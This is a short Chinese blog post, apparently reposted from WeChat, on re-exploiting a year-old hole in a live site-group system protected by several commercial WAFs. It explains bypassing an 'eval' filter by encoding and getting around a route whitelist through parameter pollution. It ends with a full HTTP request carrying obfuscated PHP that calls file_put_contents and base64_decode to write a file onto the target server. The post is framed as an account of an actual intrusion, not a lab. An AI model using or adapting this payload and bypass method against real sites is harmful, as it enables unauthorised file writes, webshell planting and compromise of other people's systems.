banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

(转载)宝 想你啦~

原文:https://mp.weixin.qq.com/s/GWKhrMilIXOeUgO6CyUUqQ

已授权转载,有兴趣可以关注下公众号

某集约化站群去年留的漏洞,今年用的时候发现被拦截了。吐槽下,这是彻底疯狂了吗,百度云 waf、华为云 waf、安全狗都弄一起是什么鬼啊.....

waf bypass

比较简单,过滤了 eval 编码下就行。

image

路由白名单限制 bypass

随意请求访问发现存在路由限制,只允许访问指定路径。

640

但是不可能所有路径都写死,比如搜索功能需要接收用户输入内容,抓包确认搜索接口可以正常使用且不会触发路由白名单限制。

640

因此猜测可以利用参数污染绕过限制,例如:

#插入同名参数
/index.php?name=bob&name=rose

#后端实际可能接收
name=rose

getshell 后查看代码,确认该接口匹配的是任意内容。

Snipaste_2024-10-20_18-15-37

最终 payload

POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'
加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。